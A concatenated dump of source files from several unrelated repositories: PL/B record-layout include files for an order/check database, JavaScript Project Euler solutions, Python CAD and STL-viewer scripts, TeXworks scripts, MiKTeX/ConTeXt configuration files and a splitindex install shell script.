OCompID Dim 1 335-335 Brokerage Company ID 'N' or ' '= NIN 'P' = Pacific lists
OCompID2 Dim 1 336-336 Management Company ID 'N' or ' '= NIN 'P' = Pacific lists
ofiller dim 72 337-408
.ofiller dim 73 336-408
.ofiller dim 74 335-408
.end patch 21.1
.ofiller dim 80 329-408
.end patch 20
* .......................................................................
ORDVARS VARLIST ORCODE:
OSTAT:
OMLRNUM:
OLRN:
OCOBN:
OLNUM:
OLON:
OMLRPON:
OQTY:
OPPM:
OMLRKY:
OFOCODE:
ORTNDTEC:
ORTNDTEY:
ORTNDTEM:
ORTNDTED:
OMDTEC:
OMDTEY:
OMDTEM:
OMDTED:
OTOCODE:
OSOTCODE:
OCCODE:
OLRNCO:
OODTECOC:
OODTECOY:
OODTECOM:
OODTECOD:
OQTYCO:
OSPI:
OBildrct:
OBRKGUAR:
OELCODE:
OODNUM:
OODES:
ONETQTY:
OCAMP:
OCLRSTAT:
OCLRINIT:
OBRKRPT:
OCLRDTEC:
OCLRDTEY:
OCLRDTEM:
OCLRDTED:
ORENT:
OHIST:
OXPPM:
ORTNNUM:
OTAPERET:
OUQTY:
OSALES10:
osales:
OCOCODE:
OCO2CODE:
OODTEC:
OODTEY:
OODTEM:
OODTED:
OSCODE:
OCOMSLCT:
OSHP:
O1DES:
O2DES:
OREUSE:
ODOWJ:
OEXQTY:
GUARCODE:
OBRKNUM:
OBRKCNT:
OSAMCDE:
onetper:
onetrc:
onetfm:
onetmin:
OFullFil:
.begin patch 21.1
OCompID:
OCompID2:
.end patch 21.1
ofiller
<file_sep>/include/nord6dd.inc
......................................
.nord6DD INCLUSION
.NIN supplimental Cancelled LCR FILE DEFINITION
.
.FILE NAME: NInord6
.REC LENGTH: 26 FIXED
.INDEX KEY: (1) 1-6 (LR#)
.
. Patch 1.1 Changed IP Address of File Manager DMB 18JUN05
.
.nord6NAME INIT "NINORD6"
.>Patch 1.1 Begin
.nord6NAME INIT "NINORD6.ISI|20.20.30.103:502"
nord6NAME INIT "NINORD6.ISI|NINS1:502"
.>Patch 1.1 End
nord6FILE IFILE KEYLEN=6,FIXED=27
nord6FLD DIM 6
nord6FLAG FORM 1
nord6PATH FORM 1
nord6LOCK FORM 1
.
.
ORD6VARS LIST
nord6LR DIM 6 001-006 ORDER LR
nord6STAT DIM 2 007-008 APPROVAL STATUS
.
.0 OR " " = Cancelled 4 = Cancelled
.1 = Mail Date over 6 months old 5 = Cancelled
.2 = Cancelled 6 = Cancelled
.3 = Cancelled 7 = Cancelled
NORD6PDTE DIM 8 009-016 DATE ENTERED CCYYMMDD
.note actual order date changes to date approved (if approved)
nord6STA1 DIM 1 017-017 OLD OSTAT - "l", "p"
nord6STA2 DIM 2 018-019 CLEARANCE STATUS
.see notes from sales
.Following field was designed to hold date of last change. Now holds date the record was automatically Cancelled,
.if applicable.
nord6CDTE DIM 8 020-027 DATE ENTERED CCYYMMDD
LISTEND
<file_sep>/include/nchkdd.inc
..............................................................................
.
. NCHKDD INCLUSION
.
. FILE NAME : NINCHK.DAT
. REC LENGTH: 110
. INDEX KEY : 1-23 CONTROL NUMBER + CONTROL DATE + CHECK NUMBER
. AAMDEX KEY: 1-11 CONTROL NUMBER/CONTROL DATE
. 12-23 CHECK NUMBER
. 32-46 AMOUNT
. 47-91 PAYOR
..............................................................................
. Patch 1.1 01/10/2005 ASH Added filler for eventual increase of check number
.
NCHKLIST Filelist
.NCHKFILE IFILE KEYLEN=23,FIXED=110,NODUPLICATES
.NCHKFLE2 AFILE FIXED=110
NCHKFILE IFILE NAME="NINCHK.ISI"
NCHKFLE2 AFILE NAME="NINCHK.AAM"
Filelistend
NCHKNAME INIT "NINCHK"
.START PATCH 1.1 REPLACED LOGIC
.NCHKFLD DIM 17
NCHKFLD DIM 23
.END PATCH 1.1 REPLACED LOGIC
NCHKFLD1 DIM 14
.START PATCH 1.1 REPLACED LOGIC
.NCHKFLD2 DIM 9
NCHKFLD2 DIM 15
.END PATCH 1.1 REPLACED LOGIC
NCHKFLD3 DIM 18
NCHKFLD4 DIM 48
NCHKFLAG FORM 1
NCHKlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NCHKVARS list
NCHKCONT DIM 3 1-3 CONTROL NUMBER (KEY) (AAMKEY)
NCHKCONTD DIM 8 4-11 CONTROL DATE (AAMKEY)
.START PATCH 1.1 REPLACED LOGIC
.NCHKNUM DIM 6 12-17 CHECK NUMBER (KEY) (AAMKEY)
NCHKNUM DIM 12 12-23 CHECK NUMBER (KEY) (AAMKEY)
.END PATCH 1.1 REPLACED LOGIC
NCHKDATE DIM 8 24-31 CHECK DATE - CCYYMMDD
NCHKAMT FORM 12.2 32-46 CHECK AMOUNT
NCHKPAYOR DIM 45 47-91 CHECK PAYOR
NCHKFILL DIM 19 92-110 FILL
listend
<file_sep>/include/nctrdd.inc
..............................................................................
.
. NCTRDD INCLUSION
.
. FILE NAME : CONTROLS.DAT
. REC LENGTH: 43
. INDEX KEY : 1-11
. AAMDEX KEY : 1-3
.
.PATCH 1.2 DLH INCREASED Record added compid for PLI
.PATCH 1.1 ASH INCREASED ISAM, ADDED AAM
..............................................................................
.
.NCTRFILE IFILE KEYLEN=3,FIXED=42,NODUPLICATES
NCTRLIST Filelist
NCTRFILE IFILE NAME="CONTROLS.ISI|NINS1:502"
NCTRFLE2 AFILE NAME="CONTROLS.AAM|NINS1:502"
Filelistend
NCTRNAME INIT "CONTROLS"
NCTRFLD DIM 11
NCTRFLD1 DIM 6
NCTRFLAG FORM 1
nCTRlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NCTRVARS list
NCTRNUM dim 3 1-3 .CONTROL NUMBER (KEY/AAMKEY)
NCTRDATE DIM 8 4-11 .CONTROL DATE - CCYYMMDD (KEY)
NCTRAMT FORM 12.2 12-26 .CONTROL AMOUNT
NCTRCODE FORM 1 27-27 .CONTROL CODE - "1" Edit was run - limited modification
. . "2" Checks were run - no modification at all!!!
NCTRAMT2 FORM 12.2 28-42 .SECONDARY CONTROL AMOUNT
.begin patch 1.2
NCTRCOMP Dim 1 43-43 .COmpany ID "N" or " " = NIN "P" = PLI
.end patch 1.2
listend
<file_sep>/include/CVT.INC
*......................................................................
.
CVT ENDSET CVTFLD CHECK LAST BYTE.
RESET MPCHARS
SCAN CVTFLD IN MPCHARS IS IT A MINUSOVRPNCH?
GOTO CVTMP IF EQUAL YES.
RESET CVTFLD NO.
TYPE CVTFLD CHECK NUMERIC VALIDITY.
RETURN IF EQUAL ITS OK.
FORMERR DISPLAY *P1:23,*EL,*B,"FORMAT ERROR READING LR: ",LRN
RETURN POP THE STACK.
CVTMP REPLACE MPCHANGE IN CVTFLD CHANGE MP TO NUMBER.
RESET CVTFLD
TYPE CVTFLD VALID NUMERIC?
GOTO FORMERR IF NOT EQUAL NO.
MOVE CVTFLD TO NUM10 MOVE INTO NUMERIC.
MULTIPLY "-1" BY NUM10 CHANGE TO MINUS.
MOVE NUM10 TO CVTFLD MOVE BACK TO DIM.
RETURN
*.........................
<file_sep>/include/nguadd.inc
..............................................................................
.
. NGUADD INCLUSION
. NIN GUAER FILE DEFINITION
.
. FILE NAME : NINGUAR
. REC LENGTH: 14 FIXED
. INDEX KEY : 1-6 (List order number)
..09sep2000 New
..............................................................................
.
NGUAFILE IFILE KEYLEN=6
NGUANAME INIT "NINGUAR"
NGUAFLD DIM 6
NGUAFLG1 FORM 1
.
GUAvars list
GUALR DIM 6 001-006 LIST rental ORDER number
GUADate DIM 8 007-014 Date CCYYMMDD
listend
..............................................................................*
<file_sep>/include/NCRCDD.INC
.**************************************************************************************************************************************************************
.* NCRCDD.INC - VARIABLE INCLUDE FOR NINORD3 - CORRECTION/CANCELATION FILE.
.*******************************************************************************
.* LENGTH: 18
.*
.* ACCESS: ISI
.* KEY : 1-6 NCRCKEY
.* key 2 7-14 date
.*revisions
.*07Apr98 DLH add second key by date,CHANGE LAYOUT, ADD LOCK OPTIONS
.* year 2000 compliance.
.. Patch 1.2 Changed IP address of File Manager DMB 18JUN04
.. Patch 1.1 Added file to File Manager ASH 07AUG01
.***********************
.
NCRCFILE IFILE KEYLEN=6,FIXED=18 *DUPLICATES ALLOWED.
ncrcfle2 Ifile keylen=8,fixed=18
.NCRCFILE IFILE KEYLEN=12,FIXED=16 *DUPLICATES ALLOWED.
NCRCFLAG FORM 1
.START PATCH 1.1 REPLACED LOGIC
.NCRCNAME INIT "NINORD3 "
.NCRCNME2 INIT "NINORD3A"
.Patch 1.2 Begin
.NCRCNAME INIT "NINORD3.ISI|20.20.30.103:502 "
NCRCNAME INIT "NINORD3.ISI|NINS1:502 "
.NCRCNME2 INIT "NINORD3A.ISI|20.20.30.103:502"
NCRCNME2 INIT "NINORD3A.ISI|NINS1:502"
.Patch 1.2 End
.END PATCH 1.1 REPLACED LOGIC
NCRCFLG2 FORM 1
.NCRCFLD DIM 12
NCRCFLD DIM 6
ncrcfld2 dim 8
ncrcpath form 1
NCRCLOCK FORM 1 0,1 = FILEPI, 2=RECORD LOCK, 3=NO LOCK
ncrcvars list
NCRCKEY DIM 6 1-6 ORDER LR NUMBER key1
ncrccc dim 2 7-8 Century of revision \
NCRCYY DIM 2 9-10 DATE OF REVISION \
NCRCMM DIM 2 11-12 DATE OF REVISION >key 2
NCRCDD DIM 2 13-14 DATE OF REVISION /
NCRCCODE DIM 1 15-15 STATUS 'R'=REVISED 'C'=CANCELLED.
NCRCTYP DIM 3 16-18 WHO REVISED.
listend
.
.pre 07apr98
............
.NCRCKEY DIM 6 1-6 ORDER LR NUMBER.
.NCRCCODE DIM 1 7-7 STATUS 'R'=REVISED 'C'=CANCELLED.
.NCRCMM DIM 2 8-9 DATE OF REVISION.
.NCRCDD DIM 2 10-11 DATE OF REVISION.
.NCRCYY DIM 2 12-13 DATE OF REVISION.
.NCRCTYP DIM 3 14-16 WHO REVISED.
.
| e4a80e5438d27667ac97aeb76eed4f7a112beb29 | [
"SQL",
"HTML",
"INI",
"PHP",
"C++"
] | 186 | PHP | wobbly/NINCAL | 0204eef37953568419732b2a83f9dacdd19e9db4 | c126a9c55a846efb0a2b68cb2224bdb9921bb36d |
HEAD | <file_sep># js-project_euler
<file_sep>var isPrime = function(input){
for(var i = 2; i < input; i++){
if(input % i === 0){
return false;
}
}
return true;
};
var maxPrimeFactor = function(input){
var divisor = input - 1;
while(divisor > 1){
if(input % divisor === 0 && isPrime(divisor)){
return divisor;
}
divisor--;
}
return input;
}
var numberInput3 = document.querySelector("[name=inputNumber3]");
var resultArea3 = document.querySelector(".max-prime-factor");
numberInput3.addEventListener('input', function() {
var val = maxPrimeFactor(this.value);
resultArea3.textContent = val;
});<file_sep>var evenFibonacciNumbers = function(num){
var sum = 0;
var sequence = [];
sequence[0] = sequence[1] = 1;
sequence[2] = 2;
while(sequence[2] <= num){
sequence[2] = sequence[0] + sequence[1];
if(sequence[2] % 2 === 0 && sequence[2] <= num){
sum += sequence[2];
}
sequence[0] = sequence[1];
sequence[1] = sequence[2];
}
return sum;
};
var numberInput2 = document.querySelector("[name=inputNumber2]");
var resultArea2 = document.querySelector(".even-fibonacci-numbers");
numberInput2.addEventListener('input', function() {
var val = evenFibonacciNumbers(this.value);
resultArea2.textContent = val;
}); | e7cb2d2bbbea609d0f87c3a993dcdd755f370511 | [
"Markdown",
"JavaScript"
] | 3 | Markdown | EGiataganas/js-project_euler | 4c5458c50d09be6fd60982f3cb2a4a1397b8964c | dfd6af9423c1d2398f6f9eb62df9a33d9ed038e5 |
refs/heads/master | <file_sep>from occmodelviewer import viewer
from occmodel import *
solid = Solid()
solid.createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
print(solid.centreOfMass())
view = viewer(interactive = True)
view.add(solid)
view.redraw()
#viewer(solid)
#viewer((solid,face,edge))<file_sep>// TeXworksScript
// Title: Title Case
// Description: Converts the Current Selection to Title Case
// Author: <NAME>
// Version: 0.1
// Date: 2009-09-07
// Script-Type: standalone
// Context: TeXDocument
/* To Title Case 1.1.1
* <NAME> <http://individed.com>
* 23 May 2008
*
* Copyright (c) 2008 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
/* MODIFIED by <NAME> for use with TeXworks: added optional leading
backslash to the word-finding regex, to protect TeX control words */
String.prototype.toTitleCase = function() {
return this.replace(/(\\?[\w&`'ÔÕ"Ò.@:\/\{\(\[<>_]+-? *)/g, function(match, p1, index, title) {
if (index > 0 && title.charAt(index - 2) !== ":" &&
match.search(/^(a(nd?|s|t)?|b(ut|y)|en|for|i[fn]|o[fnr]|t(he|o)|vs?\.?|via)[ \-]/i) > -1)
return match.toLowerCase();
if (title.substring(index - 1, index + 1).search(/['"_{(\[]/) > -1)
return match.charAt(0) + match.charAt(1).toUpperCase() + match.substr(2);
if (match.substr(1).search(/[A-Z]+|&|[\w]+[._][\w]+/) > -1 ||
title.substring(index - 1, index + 1).search(/[\])}]/) > -1)
return match;
return match.charAt(0).toUpperCase() + match.substr(1);
});
};
// thanks to <NAME>'s function, the actual TW script is trivial:
if (target.objectName == "TeXDocument") {
var txt = target.selection;
if (txt != "") {
var pos = target.selectionStart;
txt = txt.toTitleCase();
target.insertText(txt);
target.selectRange(pos, txt.length);
}
} else {
"This script only works in source document windows."
}
<file_sep>#coding: utf-8
# 使用 occmodel 模組, 間接擷取 Open CASCADE 函式庫
from occmodel import *
from occmodelviewer import *
from visual import scene, color, materials, faces, points
import os, struct
# 建立三個 circles, 然後 loft 成實體, 印出體積後
# 最後再轉成 loft.stp STEP 檔案
第一個圓 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.2)
第二個圓 = Edge().createCircle(center=(0.,0.,5.),normal=(0.,0.,1.),radius = 1.5)
第三個圓 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((第一個圓,第二個圓,第三個圓), True)
print (solid.volume())
# 特別注意轉出 loft.stp 的用法
Tools.writeSTEP(bytes('loft.stp'.encode("utf-8")),solid)
# 轉成 ASCII STL
Tools.writeSTL(bytes('loft.stl'.encode("utf-8")),solid)
file ="loft.stl"
scene.width = 400
scene.height = 400
scene.background = color.white # black
# 視窗標題取自 cvisual.pyd, 不可使用中文
scene.title = "STLViewer in VPython"
print ("利用滑鼠右鍵旋轉")
print ("滑鼠左右鍵同時按下後移動, 可以縮放畫面")
# Read STL file, only use vertex-line with xyz coordinates
list = []
#load stl file detects if the file is a text file or binary file
def load_stl(filename):
#read start of file to determine if its a binay stl file or a ascii stl file
fp=open(filename,'rb')
header=fp.read(80)
filetype=header[0:5]
# 這裡必須要能夠分辨二位元字串與文字字串
#print (type(filetype))
#print (filetype)
fp.close()
# for Python 3
if filetype==b'solid':
# for Python 2
#if filetype=='solid':
print ("讀取文字檔案格式:"+str(filename))
load_text_stl(filename)
else:
print ("讀取二位元檔案格式:"+str(filename,))
load_binary_stl(filename)
#load binary stl file check wikipedia for the binary layout of the file
#we use the struct library to read in and convert binary data into a format we can use
def load_binary_stl(filename):
'''
二位元 STL 檔案格式如下:
檔案標頭共有 80 個字元(bytes), 內容通常省略, 但是內容不可使用 solid, 以免與文字檔案 STL 混淆
UINT8[80] – Header
UINT32 – Number of triangles (I:佔 4 bytes 的 unsigned integer)
foreach triangle
REAL32[3] – Normal vector (f:每一座標分量為一佔 4 bytes 的 float, 共佔 12 bytes)
REAL32[3] – Vertex 1
REAL32[3] – Vertex 2
REAL32[3] – Vertex 3
UINT16 – Attribute byte count (H:兩個 bytes 的 unsigned short, 表示 attribute byte count)
end
'''
global list
fp=open(filename,'rb')
header=fp.read(80)
triangle_number = struct.unpack('I',fp.read(4))[0]
count=0
while True:
try:
p=fp.read(12)
if len(p)==12:
n=[struct.unpack('f',p[0:4])[0],struct.unpack('f',p[4:8])[0],struct.unpack('f',p[8:12])[0]]
p=fp.read(12)
if len(p)==12:
p1=[struct.unpack('f',p[0:4])[0],struct.unpack('f',p[4:8])[0],struct.unpack('f',p[8:12])[0]]
list.append(p1)
p=fp.read(12)
if len(p)==12:
p2=[struct.unpack('f',p[0:4])[0],struct.unpack('f',p[4:8])[0],struct.unpack('f',p[8:12])[0]]
list.append(p2)
p=fp.read(12)
if len(p)==12:
p3=[struct.unpack('f',p[0:4])[0],struct.unpack('f',p[4:8])[0],struct.unpack('f',p[8:12])[0]]
list.append(p3)
# 使用 count 來計算三角形平面個數
# triangle_number 為 STL 檔案中的三角形個數
count += 1
# 在前面 12*4 個 bytes 的 normal 與三個點資料後, 為
# 一個 2 bytes 長的 unsigned short, 其值為零, 為 attribute
fp.read(2)
# 讀完所有三角平面後, 即跳出 while
if count > triangle_number:
break
except EOFError:
break
fp.close()
def load_text_stl(filename):
global list
for dataline in open(filename,"r").readlines():
if not dataline.strip(): # skip blank lines
continue
field = dataline.split() # split with no argument makes the right place!
if field[0] == "vertex":
list.append([float(x) for x in field[1:4]])
#print (list)
#break
#for x in field[1:4]:
#print(x)
load_stl(os.path.abspath('')+'/'+file)
# Graphics
model = faces(pos=list, color=(0.8,0.8,0.8),
material=materials.plastic) # creates triangles
# 請注意, 這裡並沒有使用 STL 檔案中的平面 normal, 而是利用 VPython make_normals() 產生
model.make_normals() # creates plane normals
model.smooth(0.93) # smooths the edges
# = AllepunkteSTL points (pos = list, size = 3, color = Color.Black) # generates points
<file_sep>;;; DO NOT EDIT THIS FILE!
!include context.ini
;;;
@712132ae9c989e81a4dcd09d110e43d9
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.text]
path=.
path;=%R/dvipdfm//
[ft.map]
path=.
;; <legacy>
path;=%R/dvipdfm//
path;=%R/dvips//
;; </legacy>
path;=%R/fonts/map//
;; <legacy>
path;=%R/dvips//
;; </legacy>
[ft.PostScript header]
path=.
path;=%R/fonts/enc//
;; <legacy>
path;=%R/dvipdfm//
path;=%R/dvips//
;; </legacy>
<file_sep>Download Files
==========
https://github.com/downloads/tpaviot/oce/OCE-0.10.0-Win-MSVC2008.zip<file_sep>// TeXworksScript
// Title: LaTeX errors
// Description: Looks for errors in the LaTeX terminal output
// Author: <NAME>
// Version: 0.1
// Date: 2009-06-14
// Script-Type: hook
// Hook: AfterTypeset
// This is just a simple proof-of-concept; it will often get filenames wrong, for example.
// Switching the engines to use the FILE:LINE-style error messages could help a lot.
parenRE = new RegExp("[()]");
newFileRE = new RegExp("^\\(([\\./][^ )]+)");
lineNumRE = new RegExp("^l\\.(\\d+)");
badLineRE = new RegExp("^(?:Over|Under)full \\\\hbox.*at lines (\\d+)");
result = [];
// get the text from the standard console output
txt = target.consoleOutput;
lines = txt.split('\n');
curFile = undefined;
filenames = [];
extraParens = 0;
for (i = 0; i < lines.length; ++i) {
line = lines[i];
// check for error messages
if (line.match("^! ")) {
var error = [];
// record the current input file
error[0] = curFile;
// record the error message itself
error[2] = line;
// look ahead for the line number and record that
error[1] = 0;
while (++i < lines.length) {
line = lines[i];
matched = lineNumRE.exec(line);
if (matched) {
error[1] = matched[1];
break;
}
}
result.push(error);
continue;
}
// check for over- or underfull lines
matched = badLineRE.exec(line);
if (matched) {
var error = [];
error[0] = curFile;
error[1] = matched[1];
error[2] = line;
result.push(error);
continue;
}
// try to track beginning/ending of input files (flaky!)
pos = line.search(parenRE);
while (pos >= 0) {
line = line.slice(pos);
if (line.charAt(0) == ")") {
if (extraParens > 0) {
--extraParens;
}
else if (filenames.length > 0) {
curFile = filenames.pop();
}
line = line.slice(1);
}
else {
match = newFileRE.exec(line);
if (match) {
filenames.push(curFile);
curFile = match[1];
line = line.slice(match[0].length);
extraParens = 0;
}
else {
++extraParens;
line = line.slice(1);
}
}
if (line == undefined) {
break;
}
pos = line.search(parenRE);
}
}
// finally, return our result, or 'undefined' if nothing was found
if (result.length == 0) {
result = undefined;
}
result;
<file_sep>;;; DO NOT EDIT THIS FILE!
[cont-cz.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Czech ConTeXt (pdfTeX)
input=cont-cz.ini
name=cont-cz
[cont-cz.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Czech ConTeXt (XeTeX)
input=cont-cz.ini
name=cont-cz
[cont-de.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=German ConTeXt (pdfTeX)
input=cont-de.ini
name=cont-de
[cont-de.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=German ConTeXt (XeTeX)
input=cont-de.ini
name=cont-de
[cont-en.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=English ConTeXt (pdfTeX)
input=cont-en.ini
name=cont-en
[cont-en.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=English ConTeXt (XeTeX)
input=cont-en.ini
name=cont-en
#[cont-es.pdftex]
#
#arguments=-enable-8bit-chars
#attributes=exclude
#compiler=pdftex
#description=Spanish ConTeXt (pdfTeX)
#input=cont-es.ini
#name=cont-es
#[cont-es.xetex]
#
#arguments=-enable-8bit-chars
#attributes=exclude
#compiler=xetex
#description=Spanish ConTeXt (XeTeX)
#input=cont-es.ini
#name=cont-es
[cont-fr.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=French ConTeXt (pdfTeX)
input=cont-fr.ini
name=cont-fr
[cont-fr.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=French ConTeXt (XeTeX)
input=cont-fr.ini
name=cont-fr
[cont-it.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Italian ConTeXt (pdfTeX)
input=cont-it.ini
name=cont-it
[cont-it.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Italian ConTeXt (XeTeX)
input=cont-it.ini
name=cont-it
[cont-nl.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Dutch ConTeXt (pdfTeX)
input=cont-nl.ini
name=cont-nl
[cont-nl.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Dutch ConTeXt (XeTeX)
input=cont-nl.ini
name=cont-nl
[cont-ro.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Romanian ConTeXt (pdfTeX)
input=cont-ro.ini
name=cont-ro
[cont-ro.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Romanian ConTeXt (XeTeX)
input=cont-ro.ini
name=cont-ro
[cont-uk.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=UK English ConTeXt (pdfTeX)
input=cont-uk.ini
name=cont-uk
[cont-uk.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=UK English ConTeXt (XeTeX)
input=cont-uk.ini
name=cont-uk
<file_sep>;;; MiKTeX startup information
[Paths]
;; user TEXMF root directories
;;UserRoots=..\..\..\texmf-local
;;UserInstall=..\..\..\texmf-local
UserData=..\..\..\texmf-local
UserConfig=..\..\..\texmf-local
[Auto]
Config=Portable
<file_sep>#!/bin/sh
archbin=false
tdsarchive=false
while [ $# -gt 0 ]; do
case $1 in
--prefix)
if [ $# -lt 2 ]; then
echo "$0: argument expected after --prefix" >&2
exit 1
else
prefix=$2
shift 2
fi
;;
--prefix=*)
prefix=${1#--prefix=}
shift 1
;;
--archbin)
archbin=true
shift 1
;;
--tdsarchive)
tdsarchive=true
shift 1
;;
--bindir)
if [ $# -lt 2 ]; then
echo "$0: argument expected after --bindir" >&2
exit 1
else
bindir=$2
shift 2
fi
;;
--bindir=*)
bindir=${1#--bindir=}
shift 1
;;
--mandir)
if [ $# -lt 2 ]; then
echo "$0: argument expected after --mandir" >&2
exit 1
else
mandir=$2
shift 2
fi
;;
--mandir=*)
mandir=${1#--mandir=}
shift 1
;;
--texmf)
if [ $# -lt 2 ]; then
echo "$0: argument expected after --texmf" >&2
exit 1
else
texmf=$2
shift 2
fi
;;
--texmf=*)
texmf=${1#--texmf=}
shift 1
;;
--version|-v)
echo "install.sh v0.1"
echo "Copyright (c) <NAME> 2002"
exit 0
;;
--help|-h)
echo "Usage: install.sh [OPTIONS]"
echo
echo "Installs SplitIndex for all unix like environments."
echo
echo "OPTIONS:"
echo "--prefix=<DIR> install binaries at <DIR>/bin and manuals at <DIR>/man"
echo " (default: /usr/local)"
echo "--bindir=<DIR> install binaries at <DIR>"
echo "--archbin install binaries at arch depending directories at bindir"
echo "--mandir=<DIR> install manuals at <DIR>"
echo "--texmf=<DIR> install packages and TeX programs at <DIR>/tex/latex/splitindex,"
echo " documentation (dvi and pdf) at <DIR>/doc/latex/splitindex and"
echo " sources at <DIR>/source/latex/splitindex"
echo " (default: \$TEXMFLOCAL if you are root and \$HOMETEXMF if"
echo " you are not root)"
exit 0
;;
--dist)
mkdir -p splitidx
cp -L splitindex splitindex-Linux-i386
cp -L splitindex.tex splitindex.pl splitindex.c splitindex.java \
splitindex.class splitindex.exe splitidx.dtx splitidx.ins \
splitindex-Linux-i386 splitindex-OpenBSD-i386 \
splitindex.1 install.txt manifest.txt install.sh \
README splitidx
tar jcvf splitidx-`date +%F`.tar.bz2 splitidx
cd splitidx
rm -r chroot
./install.sh --texmf ../chroot/texmf --tdsarchive
cd ..
rm -r splitidx
cd chroot/texmf
zip -r ../../splitindex-`date +%F`.tds.zip *
cd ../..
find chroot/texmf/ | \
sed 's/chroot\//+-/g;s/[a-z0-9-]*\//-/g'
mkdir chroot/splitindex
cp -R -p -L chroot/texmf/source/latex/splitindex/* chroot/splitindex
cp -R -p -L chroot/texmf/doc/latex/splitindex/* chroot/splitindex
cd chroot
zip -r ../splitindex-`date +%F`.CTAN.zip splitindex
cd ..
rm -r chroot
exit 0
;;
*)
echo "unkown option \`$1'" >&2
echo "Try \`./install.sh --help' for more information." >&2
exit 1;
;;
esac
done
case `uname -s -m` in
OpenBSD*i?86*)
cp -pf splitindex-OpenBSD-i386 splitindex
splitindex=splitindex
;;
Linux*i?86*)
cp -pf splitindex-Linux-i386 splitindex
splitindex=splitindex
;;
CYGWIN*i?86*)
splitindex=splitindex.exe
;;
*)
if ! ./splitindex -V; then
echo 'Os '`uname -s -m`' not supported!'
echo 'Trying to compile the source:'
gcc -O3 -Wall -o splitindex splitindex.c || \
gcc -O3 -Wall -DNO_LONGOPT -o splitindex splitindex.c || \
echo 'You have to compile splitindex.c by your own!'
fi
if ./splitindex -V; then
splitindex=splitindex
cp -p splitindex splitindex-`uname -s`-`uname -m`
fi
;;
esac
if [ -z "$prefix" ]; then
prefix=/usr/local
fi
if [ -z "$bindir" ]; then
bindir=$prefix/bin
fi
if [ -z "$mandir" ]; then
mandir=$prefix/man
fi
if [ -z "$texmf" ]; then
if [ "r$USER" = "rroot" ]; then
texmf=`kpsexpand '$TEXMFLOCAL'`
else
texmf=`kpsexpand '$HOMETEXMF'`
fi
if [ -z "$texmf" ]; then
echo "kpsexpand '$TEXMFLOCAL' or kpsexpand '$HOMETEXMF' failed!" >&2
echo "You have to use option --texmf=<DIR>." >&2
echo "This error is fatal!" >&2
exit 1
fi
fi
latex splitidx.ins
latex splitidx.dtx
latex splitidx.dtx
mkindex splitidx
latex splitidx.dtx
pdflatex splitidx.dtx
pdflatex splitidx.dtx
mkindex splitidx
pdflatex splitidx.dtx
install -v -m 755 -d $texmf/doc/latex/splitindex
install -v -m 755 -d $texmf/tex/latex/splitindex
install -v -m 755 -d $texmf/source/latex/splitindex
if $tdsarchive; then
install -v -m 755 -d $texmf/scripts/splitindex/perl
install -v -m 755 splitindex.pl $texmf/scripts/splitindex/perl
install -v -m 644 splitindex.1 $texmf/doc/latex/splitindex
elif $archbin; then
install -v -m 755 -d $bindir
install -v -m 755 -d $bindir/i386-linux
install -v -m 755 -d $bindir/i386-openbsd
install -v -m 755 -d $bindir/i386-cygwin
install -v -m 755 -d $bindir/any
install -v -m 755 splitindex-Linux-i386 $bindir/i386-linux/splitindex
install -v -m 755 splitindex-OpenBSD-i386 $bindir/i386-openbsd/splitindex
install -v -m 755 splitindex.exe $bindir/i386-cygwin/splitindex.exe
install -v -m 755 splitindex.pl $bindir/any
install -v -m 644 splitindex.class $bindir/any
install -v -m 755 -d $mandir/man1
install -v -m 644 splitindex.1 $mandir/man1
else
install -v -m 755 -d $bindir
install -v -m 755 $splitindex splitindex.pl $bindir
install -v -m 644 splitindex.class $bindir
fi
install -v -m 644 splitindex.tex splitidx.sty $texmf/tex/latex/splitindex
install -v -m 644 README install.txt splitidx.pdf $texmf/doc/latex/splitindex
install -v -m 644 \
splitindex.1 splitindex.c splitindex.java splitindex.class \
splitindex.tex\
README splitidx.dtx splitidx.ins manifest.txt install.txt \
$texmf/source/latex/splitindex
install -v -m 755 \
install.sh \
splitindex.pl splitindex.exe \
